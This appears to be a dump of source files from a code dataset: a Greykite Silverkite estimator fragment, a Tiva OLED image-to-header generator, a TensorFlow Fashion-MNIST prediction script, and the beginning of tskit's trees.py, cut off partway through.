        self.uncertainty_dict = get_silverkite_uncertainty_dict(
            uncertainty=self.uncertainty_dict,
            simple_freq=simple_freq,
            coverage=self.coverage)

        # Updates coverage if None, to match the widest interval of
        # ``uncertainty_dict``. If coverage is not None, they are
        # already consistent, but we set it anyway.
        if self.uncertainty_dict is not None:
            quantiles = self.uncertainty_dict["params"]["quantiles"]
            self.coverage = quantiles[-1] - quantiles[0]

    def fit(
            self,
            X,
            y=None,
            time_col=cst.TIME_COL,
            value_col=cst.VALUE_COL,
            **fit_params):
        """Pre-processing before fitting ``Silverkite`` forecast model.

        Parameters
        ----------
        X: `pandas.DataFrame`
            Input timeseries, with timestamp column,
            value column, and any additional regressors.
            The value column is the response, included in
            ``X`` to allow transformation by `sklearn.pipeline`.
        y: ignored
            The original timeseries values, ignored.
            (The ``y`` for fitting is included in ``X``).
        time_col: `str`
            Time column name in ``X``.
        value_col: `str`
            Value column name in ``X``.
        fit_params: `dict`
            additional parameters for null model.

        Notes
        -----
        Subclasses are expected to call this at the beginning of their ``fit`` method,
        before calling
        `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
        """
        # NB: calls `__set_uncertainty_dict` before `super().fit` to ensure
        # coverage is correct before fitting the null model.
        # (null model does not currently use `coverage`, but may in the future.)
        self.__set_uncertainty_dict(
            X=X,
            time_col=time_col,
            value_col=value_col)
        self.df = X

        super().fit(
            X=X,
            y=y,
            time_col=time_col,
            value_col=value_col,
            **fit_params)

    def finish_fit(self):
        """Makes important values of ``self.model_dict`` conveniently accessible.

        To be called by subclasses at the end of their ``fit`` method. Sets
        {``pred_cols``, ``feature_cols``, and ``coef_``}.
        """
        if self.model_dict is None:
            raise ValueError("Must set `self.model_dict` before calling this function.")

        self.pred_cols = self.model_dict["pred_cols"]
        self.feature_cols = self.model_dict["x_mat"].columns
        # model coefficients (only available for linear-style ML models
        # that expose `coef_`; tree ensembles do not)
        if hasattr(self.model_dict["ml_model"], "coef_"):
            self.coef_ = pd.DataFrame(
                self.model_dict["ml_model"].coef_,
                index=self.feature_cols)

        self._set_silverkite_diagnostics_params()
        return self

    def _set_silverkite_diagnostics_params(self):
        # Lazily creates the diagnostics helper and points it at this
        # estimator's predictor categories and fitted column names.
        if self.silverkite_diagnostics is None:
            self.silverkite_diagnostics = SilverkiteDiagnostics()
        self.silverkite_diagnostics.set_params(self.pred_category, self.time_col_, self.value_col_)

    def predict(self, X, y=None):
        """Creates forecast for the dates specified in ``X``.

        Parameters
        ----------
        X: `pandas.DataFrame`
            Input timeseries with timestamp column and any additional regressors.
            Timestamps are the dates for prediction.
            Value column, if provided in ``X``, is ignored.
        y: ignored.

        Returns
        -------
        predictions: `pandas.DataFrame`
            Forecasted values for the dates in ``X``. Columns:

                - ``TIME_COL``: dates
                - ``PREDICTED_COL``: predictions
                - ``PREDICTED_LOWER_COL``: lower bound of predictions, optional
                - ``PREDICTED_UPPER_COL``: upper bound of predictions, optional
                - [other columns], optional

            ``PREDICTED_LOWER_COL`` and ``PREDICTED_UPPER_COL`` are present
            if ``self.coverage`` is not None.
        """
        # Returns the cached result if applicable
        cached_predictions = super().predict(X=X)
        if cached_predictions is not None:
            return cached_predictions

        if self.model_dict is None:
            raise NotFittedError("Call `fit` before calling `predict`.")
        if self.pred_cols is None:
            raise NotFittedError("Subclass must call `finish_fit` inside the `fit` method.")

        pred_df = self.silverkite.predict(
            fut_df=X,
            trained_model=self.model_dict,
            past_df=None,
            new_external_regressor_df=None)["fut_df"]  # regressors are included in X
        self.forecast = pred_df

        # renames columns to standardized schema
        output_columns = {
            self.time_col_: cst.TIME_COL,
            cst.VALUE_COL: cst.PREDICTED_COL}

        # Checks if uncertainty is also returned.
        # If so, extract the upper and lower limits of the tuples in
        # ``uncertainty_col`` to be lower and upper limits of the prediction interval.
        # Note that the tuple might have more than two elements if more than two
        # ``quantiles`` are passed in ``uncertainty_dict``.
        uncertainty_col = f"{cst.VALUE_COL}_quantile_summary"
        if uncertainty_col in list(pred_df.columns):
            # First/last quantile become the lower/upper prediction bounds.
            pred_df[cst.PREDICTED_LOWER_COL] = pred_df[uncertainty_col].apply(
                lambda x: x[0])
            pred_df[cst.PREDICTED_UPPER_COL] = pred_df[uncertainty_col].apply(
                lambda x: x[-1])
            output_columns.update({
                cst.PREDICTED_LOWER_COL: cst.PREDICTED_LOWER_COL,
                cst.PREDICTED_UPPER_COL: cst.PREDICTED_UPPER_COL,
                uncertainty_col: uncertainty_col})
        if cst.ERR_STD_COL in pred_df.columns:
            output_columns.update({cst.ERR_STD_COL: cst.ERR_STD_COL})
        predictions = (pred_df[output_columns.keys()]
                       .rename(output_columns, axis=1))
        # Caches the predictions
        self.cached_predictions_ = predictions
        return predictions

    @property
    def pred_category(self):
        """A dictionary that stores the predictor names in each category.

        This property is not initialized until used. This speeds up the
        fitting process. The categories includes

        - "intercept" : the intercept.
        - "time_features" : the predictors that include
          `~greykite.common.constants.TIME_FEATURES`
          but not
          `~greykite.common.constants.SEASONALITY_REGEX`.
        - "event_features" : the predictors that include
          `~greykite.common.constants.EVENT_PREFIX`.
        - "trend_features" : the predictors that include
          `~greykite.common.constants.TREND_REGEX`
          but not
          `~greykite.common.constants.SEASONALITY_REGEX`.
        - "seasonality_features" : the predictors that include
          `~greykite.common.constants.SEASONALITY_REGEX`.
        - "lag_features" : the predictors that include
          `~greykite.common.constants.LAG_REGEX`.
        - "regressor_features" : external regressors and other predictors
          manually passed to ``extra_pred_cols``, but not in the categories above.
        - "interaction_features" : the predictors that include
          interaction terms, i.e., including a colon.

        Note that each predictor falls into at least one category.
        Some "time_features" may also be "trend_features".
        Predictors with an interaction are classified into all categories matched by
        the interaction components. Thus, "interaction_features" are already included
        in the other categories.
        """
        if self.model_dict is None:
            raise NotFittedError("Must fit before getting predictor category.")
        if self._pred_category is None:
            # extra_pred_cols could be None/list
            extra_pred_cols = [] if self.extra_pred_cols is None else self.extra_pred_cols
            # regressor_cols could be non-exist/None/list
            # the if catches non-exist and None
            regressor_cols = [] if getattr(self, "regressor_cols", None) is None else getattr(self, "regressor_cols")
            self._pred_category = create_pred_category(
                pred_cols=self.model_dict["x_mat"].columns,
                # extra regressors are specified via "regressor_cols" in simple_silverkite_estimator
                extra_pred_cols=extra_pred_cols + regressor_cols)
        return self._pred_category

    def summary(self, max_colwidth=20):
        # Builds the model summary via the diagnostics helper
        # (created on demand if not yet configured).
        if self.silverkite_diagnostics is None:
            self._set_silverkite_diagnostics_params()
        return self.silverkite_diagnostics.summary(self.model_dict, max_colwidth)

    def plot_components(self, names=None, title=None):
        # Delegates component plotting to the diagnostics helper.
        if self.model_dict is None:
            raise NotFittedError("Call `fit` before calling `plot_components`.")
        if self.silverkite_diagnostics is None:
            self._set_silverkite_diagnostics_params()
        return self.silverkite_diagnostics.plot_components(self.model_dict, names, title)

    def plot_trend(self, title=None):
        """Convenience function to plot the data and the trend component.

        Parameters
        ----------
        title: `str`, optional, default `None`
            Plot title.

        Returns
        -------
        fig: `plotly.graph_objs.Figure`
            Figure.
        """
        if title is None:
            title = "Trend plot"
        return self.plot_components(names=["trend"], title=title)

    def plot_seasonalities(self, title=None):
        """Convenience function to plot the data and the seasonality components.

        Parameters
        ----------
        title: `str`, optional, default `None`
            Plot title.

        Returns
        -------
        fig: `plotly.graph_objs.Figure`
            Figure.
        """
        if title is None:
            title = "Seasonality plot"
        seas_names = [
            "DAILY_SEASONALITY",
            "WEEKLY_SEASONALITY",
            "MONTHLY_SEASONALITY",
            "QUARTERLY_SEASONALITY",
            "YEARLY_SEASONALITY"]
        return self.plot_components(names=seas_names, title=title)

    def plot_trend_changepoint_detection(self, params=None):
        """Convenience function to plot the original trend changepoint detection results.

        Parameters
        ----------
        params : `dict` or `None`, default `None`
            The parameters in
            `~greykite.algo.changepoint.adalasso.changepoint_detector.ChangepointDetector.plot`.
            If set to `None`, all components will be plotted.

            Note: seasonality components plotting is not supported currently.
            ``plot`` parameter must be False.

        Returns
        -------
        fig : `plotly.graph_objs.Figure`
            Figure.
        """
        if params is None:
            params = dict(
                observation=True,
                observation_original=True,
                trend_estimate=True,
                trend_change=True,
                yearly_seasonality_estimate=True,
                adaptive_lasso_estimate=True,
                seasonality_change=False,  # currently for trend only
                seasonality_change_by_component=False,
                seasonality_estimate=False,
                plot=False)
        else:
            # currently for trend only
            params["seasonality_change"] = False
            params["seasonality_estimate"] = False
            # need to return the figure object
            params["plot"] = False
        return self.model_dict["changepoint_detector"].plot(**params)
| 44.77821 | 144 | 0.660801 |
cc3eaf123918973b1b10dca34022c75b57aed02e | 5,598 | py | Python | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | scripts/gen_img.py | JosiahCraw/Tiva-Helicopter-Controller-ENCE464- | 207fda18bf8e4b562e47205fbbdc9aaaf274c54f | [
"MIT"
] | null | null | null | # -------------------------------
# Tiva Image/Animation Generator
# -------------------------------
#
# Generates image/animation header files for use
# with the Tiva TM4c123 and the OrbitBooster Pack
#
# Author: Jos Craw 2020
#
import cv2
import math
import argparse
import numpy as np
from typing import List
IMG_DEFN = """
const char {frame}[] = {lbrace}
{data}
{rbrace};
"""
FRAMES_LIST = """
const char* {iname}_frames[{num}] = {lbrace}
{data}
{rbrace};
"""
H_TEMPLATE = """
/*
* Auto Generated Image H file for Heli Project
*
* Author: Jos Craw 2020
*/
#include <stdint.h>
{data}
uint16_t {iname}_width = {width};
uint16_t {iname}_height = {height};
"""
def gen_h_file(char_array: List, width: int, height: int, image_name: str):
    """Render frames as C char arrays and write them to ``<image_name>.h``.

    A single frame is emitted directly under ``image_name``; multiple
    frames additionally get a pointer table and a frame count so the
    firmware can play them back as an animation.
    """
    frame_defs = []
    frame_names = []
    total = len(char_array)
    for index, frame in enumerate(char_array):
        # One comma-terminated source line per row of bytes.
        body = ",\n".join(" {}".format(', '.join(row)) for row in frame)
        name = image_name if total == 1 else "{}_frame_{}".format(image_name, index)
        frame_names.append(" " + name)
        frame_defs.append(IMG_DEFN.format(frame=name,
                                          lbrace='{',
                                          rbrace='}',
                                          data=body))

    h_data = '\n'.join(frame_defs)
    if total > 1:
        # Animation: add the frame pointer table and the frame count.
        pointer_table = FRAMES_LIST.format(iname=image_name,
                                           lbrace='{',
                                           rbrace='}',
                                           num=total,
                                           data=",\n".join(frame_names))
        h_data += "\n{}".format(pointer_table)
        h_data += "\nuint8_t {}_frame_count = {};".format(image_name, total)

    file_data = H_TEMPLATE.format(iname=image_name,
                                  lbrace='{',
                                  rbrace='}',
                                  data=h_data,
                                  width=width,
                                  height=height)
    with open('{}.h'.format(image_name), "w+") as h_file:
        h_file.write(file_data)
def get_char_array(black_white_img):
    """Pack a binary (0/1) image array into display page bytes.

    The image is split into horizontal bands of up to 8 rows (one OLED
    "page"); within a band each column of pixels becomes one byte with
    the top row as the least significant bit. Returns a list of rows of
    ``'0x..'`` hex strings.

    Improvements over the original: removes the unused
    ``height``/``width``/``char_height``/``char_width`` locals and
    commented-out debug prints, and replaces the deprecated
    ``np.matrix.transpose`` call with ``np.transpose``.
    """
    # Split into bands of up to 8 rows each (ceiling division on row count).
    num_bands = (len(black_white_img) + 7) // 8
    bands = [black_white_img[i * 8:(i + 1) * 8] for i in range(num_bands)]

    hex_img = []
    for band in bands:
        hex_line = []
        # Transposing makes each entry a column of (up to) 8 pixels.
        for column in np.transpose(band):
            # Reverse so the top pixel becomes the least significant bit.
            bits = ''.join(str(bit) for bit in column[::-1])
            hex_line.append('0x{:02x}'.format(int(bits, 2)))
        hex_img.append(hex_line)
    return hex_img
def main():
    """Command-line entry point: convert image files into a Tiva OLED header.

    Parses CLI arguments, converts each input image to a 1-bit bitmap
    (optionally resized and/or inverted), packs the pixels into display
    bytes, and writes all frames into one generated ``.h`` file.
    """
    parser = argparse.ArgumentParser(description='Converts Images to headerfiles to be used to show images and animations on the Tiva Orbit OLED.')
    parser.add_argument('-i',
                        '--invert',
                        action='store_true',
                        help='Invert the image colours',
                        required=False
                        )
    parser.add_argument('-o',
                        '--output',
                        action="store",
                        type=str,
                        help='Defines the image name',
                        required=False
                        )
    parser.add_argument('--width',
                        action="store",
                        type=int,
                        help='Define the output image width',
                        required=False
                        )
    parser.add_argument('--height',
                        action="store",
                        type=int,
                        help='Define the output image height',
                        required=False
                        )
    parser.add_argument('input', nargs="+", help="List of images to store in output .h file")

    args = parser.parse_args()
    file_names = args.input
    if len(file_names) == 0:
        parser.print_help()
        exit(1)

    # Default header name: first input file's basename plus an "_image" suffix.
    if args.output == None:
        image_name = file_names[0].split('.')[0].lower() + "_image"
    else:
        image_name = args.output

    hex_files = []
    for file_name in file_names:
        image = cv2.imread(file_name)
        width = 0
        height = 0
        # Fall back to the source image's own dimensions unless overridden.
        if args.width != None:
            width = args.width
        else:
            width = image.shape[1]
        if args.height != None:
            height = args.height
        else:
            height = image.shape[0]
        dim = (width, height)
        image = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)
        grey_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        # Threshold to a pure black/white image before bit-packing.
        (_, black_white_img) = cv2.threshold(grey_img, 127, 255, cv2.THRESH_BINARY)
        if args.invert == True:
            black_white_img = ~black_white_img
        height = len(black_white_img)
        width = len(black_white_img[0])
        # Scale the 0/255 pixel values down to 0/1 bits.
        black_white_img = black_white_img / 255
        black_white_img = black_white_img.astype('int8')
        hex_img = get_char_array(black_white_img)
        hex_files.append(hex_img)
    # NOTE(review): width/height written to the header come from the LAST
    # processed image — presumably all frames share one size; confirm.
    gen_h_file(hex_files, width, height, image_name)


if __name__ == "__main__":
    main()
fe49176bae624dde715bda98276b7a8454db086a | 5,489 | py | Python | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | 02_keras_mnist_clothing_reusing_model_with_new_image.py | lao-tseu-is-alive/tensorflow2-tutorial | 9896ebb94d3a2340d18f3f9222e7c7501f442052 | [
"Apache-2.0"
] | null | null | null | import glob
import os
import re
# next line is to limit tensorflow verbose output
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
# Location of the saved Keras model and of the unseen sample images.
CONST_MODEL_PATH = 'trained_models/tf2_model_mnist_fashion_2Dense128x10'
CONST_NEW_IMAGES = 'unseen_test_samples/mnist_fashion_categories'
CONST_IMAGE_SIZE = (28, 28)  # MNIST FASHION image sizes
CONST_IMAGE_RESCALE = 1. / 255.0  # Normalisation factor for colors values
# Class index -> human-readable label, in MNIST-fashion label order (0-9).
class_names = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',
               'sandal', 'shirt', 'sneaker', 'bag', 'ankle_boot']
def plot_image(predictions_array, true_label, img):
    """Draw ``img`` with its predicted label, confidence and true label.

    The caption is blue when the prediction matches ``true_label``
    and red otherwise.
    """
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    plt.imshow(img, cmap=plt.cm.binary)
    predicted = np.argmax(predictions_array)
    color = 'blue' if predicted == true_label else 'red'
    caption = "{} {:2.0f}% ({})".format(class_names[predicted.item()],
                                        100 * np.max(predictions_array),
                                        class_names[true_label])
    plt.xlabel(caption, color=color)
def plot_value_array(predictions_array, true_label):
    """Bar-plot the 10 class probabilities, marking prediction vs truth.

    The predicted class bar is red and the true class bar is blue; when
    they coincide, blue wins because it is colored last.
    """
    plt.grid(False)
    plt.xticks(range(10))
    plt.yticks([])
    bars = plt.bar(range(10), predictions_array, color="#777777")
    plt.ylim([0, 1])
    bars[np.argmax(predictions_array)].set_color('red')
    bars[true_label].set_color('blue')
    plt.xticks(range(10), class_names, rotation=45)
if __name__ == '__main__':
    print('# Tensorflow version : {}'.format(tf.__version__))
    print('# TensorFlow 2 using a Model to Classify NEW images of clothing')
    print('# Loading model already fitted.')
    print("### will try to load model from path : {}".format(CONST_MODEL_PATH))
    model = load_model(CONST_MODEL_PATH)
    print('# MAKE PREDICTIONS :')
    print("""
# With the model trained, you can use it to make predictions about some images. The model's linear outputs, logits.
# Attach a softmax layer to convert the logits to probabilities, which are easier to interpret.
# logits definition : https://developers.google.com/machine-learning/glossary#logits
""")
    # Wrap the trained model with a Softmax layer so that the outputs
    # are probabilities rather than raw logits.
    probability_model = tf.keras.Sequential([model, tf.keras.layers.Softmax()])
    print("""
# The images from the training set are 28x28 NumPy arrays, with pixel values ranging from 0 to 255.
# The labels are an array of integers, ranging from 0 to 9.
# These correspond to the class of clothing the image represents:""")
    print("### Now trying model.predict with a brand new set of images !!")
    # Collect all sample images, sorted for deterministic ordering.
    test_images_path = []
    for image_path in glob.glob('{}/*.jpeg'.format(CONST_NEW_IMAGES)):
        test_images_path.append(image_path)
    test_images_path.sort()
    test_images_init = []
    test_labels = []
    test_filenames = []
    for image_path in test_images_path:
        # Load as a 28x28 grayscale image to match the training data.
        test_image = tf.keras.preprocessing.image.load_img(image_path,
                                                           color_mode='grayscale',
                                                           target_size=CONST_IMAGE_SIZE,
                                                           interpolation='nearest')
        print('test_image shape : {}'.format(np.shape(test_image)))
        # REMEMBER TO 'NORMALIZE' YOUR DATA !
        test_image_normalized = np.asarray(test_image) * CONST_IMAGE_RESCALE
        print('test_image_normalized shape : {}'.format(np.shape(test_image_normalized)))
        # Add a leading batch dimension: the model expects (1, 28, 28).
        test_image_normalized_arr = np.expand_dims(test_image_normalized, 0)
        print('test_image_normalized_arr shape : {}'.format(np.shape(test_image_normalized_arr)))
        filename = os.path.basename(image_path)
        filename_without_ext = os.path.splitext(filename)[0]
        # The true class is encoded in the filename before any digits,
        # e.g. "sandal03.jpeg" -> "sandal".
        image_real_class_name = re.split(r'\d+', filename_without_ext)[0]
        try:
            # Raises ValueError when the filename prefix is not a known class.
            image_real_class = class_names.index(image_real_class_name)
            predictions_single = probability_model.predict(test_image_normalized_arr)
            res = predictions_single[0]
            predicted_class = np.argmax(predictions_single)
            predicted_class_name = class_names[predicted_class.item()]
            print('# prediction for {} is {} = {:10} {:2.2f} percent confidence'.format(
                filename, predicted_class, predicted_class_name, (100 * res[predicted_class])))
            print(', '.join(['{}: {:2.2f}%'.format(class_names[i], 100 * x) for i, x in enumerate(res)]))
            # Show the image and the per-class probability bars side by side.
            plt.figure(figsize=(6, 3))
            plt.subplot(1, 2, 1)
            plot_image(res, image_real_class, test_image_normalized)
            plt.subplot(1, 2, 2)
            plot_value_array(res, image_real_class)
            plt.show()
            test_labels.append(image_real_class)
            test_images_init.append(test_image_normalized)
            test_filenames.append(filename)
        except ValueError as e:
            print('WARNING : Image name {} is not in the MNIST fashion classes'.format(filename))
            print('WARNING : Image name {} will not be in the test set !'.format(filename))
    print('test_images_init shape : {}'.format(np.shape(test_images_init)))
    test_images = np.array(test_images_init)
    # NOTE(review): images were already rescaled by CONST_IMAGE_RESCALE above;
    # this divides by 255 a second time — confirm whether that is intended.
    test_images = test_images / 255.0  # normalize
    print('test_images shape : {}'.format(np.shape(test_images)))
| 44.991803 | 121 | 0.651667 |
5d2763f172d75a2bd71360ec35ceb19f173c3a99 | 314,668 | py | Python | python/tskit/trees.py | molpopgen/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | 1 | 2021-08-20T06:59:30.000Z | 2021-08-20T06:59:30.000Z | python/tskit/trees.py | percyfal/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | null | null | null | python/tskit/trees.py | percyfal/tskit | cf38edb8ddfd87bac7baf0c7ecb6920a6e761b7a | [
"MIT"
] | null | null | null | #
# MIT License
#
# Copyright (c) 2018-2020 Tskit Developers
# Copyright (c) 2015-2018 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Module responsible for managing trees and tree sequences.
"""
import base64
import collections
import concurrent.futures
import functools
import itertools
import math
import textwrap
import warnings
from dataclasses import dataclass
from typing import Any
from typing import Optional
from typing import Union
import numpy as np
import _tskit
import tskit.combinatorics as combinatorics
import tskit.drawing as drawing
import tskit.exceptions as exceptions
import tskit.formats as formats
import tskit.metadata as metadata_module
import tskit.tables as tables
import tskit.util as util
import tskit.vcf as vcf
from tskit import NODE_IS_SAMPLE
from tskit import NULL
from tskit import UNKNOWN_TIME
# Lightweight record types used throughout the tree-sequence API.
CoalescenceRecord = collections.namedtuple(
    "CoalescenceRecord", "left right node children time population"
)
BaseInterval = collections.namedtuple("BaseInterval", "left right")
EdgeDiff = collections.namedtuple("EdgeDiff", "interval edges_out edges_in")


class Interval(BaseInterval):
    """
    A 2-tuple of numbers ``[left, right)`` describing a half-open genomic
    interval.

    :ivar left: The left-hand end of the interval; by convention included
        in the interval.
    :vartype left: float
    :ivar right: The right-hand end of the interval; by convention *not*
        included, i.e. the interval is half-open.
    :vartype right: float
    :ivar span: The amount of genome covered, simply ``right - left``.
    :vartype span: float
    """

    @property
    def span(self):
        # Tuple-unpack rather than attribute access; same result.
        left, right = self
        return right - left
@metadata_module.lazy_decode
@dataclass
class Individual(util.Dataclass):
    """
    An :ref:`individual <sec_individual_table_definition>` in a tree sequence.
    Since nodes correspond to genomes, individuals are associated with a collection
    of nodes (e.g., two nodes per diploid). See :ref:`sec_nodes_or_individuals`
    for more discussion of this distinction.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["id", "flags", "location", "parents", "nodes", "metadata"]
    id: int  # noqa A003
    """
    The integer ID of this individual. Varies from 0 to
    :attr:`TreeSequence.num_individuals` - 1."""
    flags: int
    """
    The bitwise flags for this individual.
    """
    location: np.ndarray
    """
    The spatial location of this individual as a numpy array. The location is an empty
    array if no spatial location is defined.
    """
    parents: np.ndarray
    """
    The parent individual ids of this individual as a numpy array. The parents is an
    empty array if no parents are defined.
    """
    nodes: np.ndarray
    """
    The IDs of the nodes that are associated with this individual as
    a numpy array (dtype=np.int32). If no nodes are associated with the
    individual this array will be empty.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>`
    for this individual, decoded if a schema applies.
    """

    # Custom eq needed because the numpy array fields cannot be compared
    # with plain ==. The isinstance guard makes comparison against a
    # non-Individual return False rather than raising AttributeError,
    # matching the behaviour of Site.__eq__, Mutation.__eq__ etc. below.
    def __eq__(self, other):
        return (
            isinstance(other, Individual)
            and self.id == other.id
            and self.flags == other.flags
            and np.array_equal(self.location, other.location)
            and np.array_equal(self.parents, other.parents)
            and np.array_equal(self.nodes, other.nodes)
            and self.metadata == other.metadata
        )
@metadata_module.lazy_decode
@dataclass
class Node(util.Dataclass):
    """
    A :ref:`node <sec_node_table_definition>` in a tree sequence, corresponding
    to a single genome. The ``time`` and ``population`` are attributes of the
    ``Node``, rather than the ``Individual``, as discussed in
    :ref:`sec_nodes_or_individuals`.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["id", "flags", "time", "population", "individual", "metadata"]
    id: int  # noqa A003
    """
    The integer ID of this node. Varies from 0 to :attr:`TreeSequence.num_nodes` - 1.
    """
    flags: int
    """
    The bitwise flags for this node.
    """
    time: float
    """
    The birth time of this node.
    """
    population: int
    """
    The integer ID of the population that this node was born in.
    """
    individual: int
    """
    The integer ID of the individual that this node was a part of.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this node, decoded if a schema
    applies.
    """

    def is_sample(self):
        """
        Returns True if this node is a sample. This value is derived from the
        ``flag`` variable.
        :rtype: bool
        """
        # bool() so the documented return type is honoured rather than
        # leaking the raw bitwise-AND integer; truthiness is unchanged.
        return bool(self.flags & NODE_IS_SAMPLE)
@metadata_module.lazy_decode
@dataclass
class Edge(util.Dataclass):
    """
    An :ref:`edge <sec_edge_table_definition>` in a tree sequence.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["left", "right", "parent", "child", "metadata", "id"]
    left: float
    """
    The left coordinate of this edge.
    """
    right: float
    """
    The right coordinate of this edge.
    """
    parent: int
    """
    The integer ID of the parent node for this edge.
    To obtain further information about a node with a given ID, use
    :meth:`TreeSequence.node`.
    """
    child: int
    """
    The integer ID of the child node for this edge.
    To obtain further information about a node with a given ID, use
    :meth:`TreeSequence.node`.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this edge, decoded if a schema
    applies.
    """
    id: int  # noqa A003
    """
    The integer ID of this edge. Varies from 0 to
    :attr:`TreeSequence.num_edges` - 1.
    """
    # Custom init to define default values with slots: class-level defaults
    # cannot be used together with __slots__, and this also lets ``id``
    # default to None even though it is declared first in __slots__.
    def __init__(self, left, right, parent, child, metadata=b"", id=None):  # noqa A003
        self.id = id
        self.left = left
        self.right = right
        self.parent = parent
        self.child = child
        self.metadata = metadata
    @property
    def span(self):
        """
        Returns the span of this edge, i.e. the right position minus the left position
        :return: The span of this edge.
        :rtype: float
        """
        return self.right - self.left
@metadata_module.lazy_decode
@dataclass
class Site(util.Dataclass):
    """
    A :ref:`site <sec_site_table_definition>` in a tree sequence.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["id", "position", "ancestral_state", "mutations", "metadata"]
    id: int  # noqa A003
    """
    The integer ID of this site. Varies from 0 to :attr:`TreeSequence.num_sites` - 1.
    """
    position: float
    """
    The floating point location of this site in genome coordinates.
    Ranges from 0 (inclusive) to :attr:`TreeSequence.sequence_length` (exclusive).
    """
    ancestral_state: str
    """
    The ancestral state at this site (i.e., the state inherited by nodes, unless
    mutations occur).
    """
    mutations: np.ndarray
    """
    The list of mutations at this site. Mutations within a site are returned in the
    order they are specified in the underlying :class:`MutationTable`.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this site, decoded if a schema
    applies.
    """
    # We need a custom eq because ``mutations`` is a numpy array, which cannot
    # be compared with plain ==; the isinstance guard keeps comparisons with
    # arbitrary objects from raising.
    def __eq__(self, other):
        return (
            isinstance(other, Site)
            and self.id == other.id
            and self.position == other.position
            and self.ancestral_state == other.ancestral_state
            and np.array_equal(self.mutations, other.mutations)
            and self.metadata == other.metadata
        )
@metadata_module.lazy_decode
@dataclass
class Mutation(util.Dataclass):
    """
    A :ref:`mutation <sec_mutation_table_definition>` in a tree sequence.
    Modifying the attributes in this class will have **no effect** on the
    underlying tree sequence data.
    """
    __slots__ = ["id", "site", "node", "derived_state", "parent", "metadata", "time"]
    id: int  # noqa A003
    """
    The integer ID of this mutation. Varies from 0 to
    :attr:`TreeSequence.num_mutations` - 1.
    """
    site: int
    """
    The integer ID of the site that this mutation occurs at. To obtain
    further information about a site with a given ID use :meth:`TreeSequence.site`.
    """
    node: int
    """
    The integer ID of the first node that inherits this mutation.
    To obtain further information about a node with a given ID, use
    :meth:`TreeSequence.node`.
    """
    derived_state: str
    """
    The derived state for this mutation. This is the state
    inherited by nodes in the subtree rooted at this mutation's node, unless
    another mutation occurs.
    """
    parent: int
    """
    The integer ID of this mutation's parent mutation. When multiple
    mutations occur at a site along a path in the tree, mutations must
    record the mutation that is immediately above them. If the mutation does
    not have a parent, this is equal to the :data:`NULL` (-1).
    To obtain further information about a mutation with a given ID, use
    :meth:`TreeSequence.mutation`.
    """
    metadata: Optional[Union[bytes, dict]]
    """
    The :ref:`metadata <sec_metadata_definition>` for this mutation, decoded if a schema
    applies.
    """
    time: float
    """
    The occurrence time of this mutation.
    """
    # To get default values on slots we define a custom init (class-level
    # defaults cannot be combined with __slots__).
    def __init__(
        self,
        id=NULL,  # noqa A003
        site=NULL,
        node=NULL,
        time=UNKNOWN_TIME,
        derived_state=None,
        parent=NULL,
        metadata=b"",
    ):
        self.id = id
        self.site = site
        self.node = node
        self.time = time
        self.derived_state = derived_state
        self.parent = parent
        self.metadata = metadata
    # We need a custom eq to compare unknown times: two UNKNOWN_TIME values
    # must compare equal here even though a direct ``==`` on the sentinel
    # would not report them as such, hence the util.is_unknown_time checks.
    def __eq__(self, other):
        return (
            isinstance(other, Mutation)
            and self.id == other.id
            and self.site == other.site
            and self.node == other.node
            and self.derived_state == other.derived_state
            and self.parent == other.parent
            and self.metadata == other.metadata
            and (
                self.time == other.time
                or (
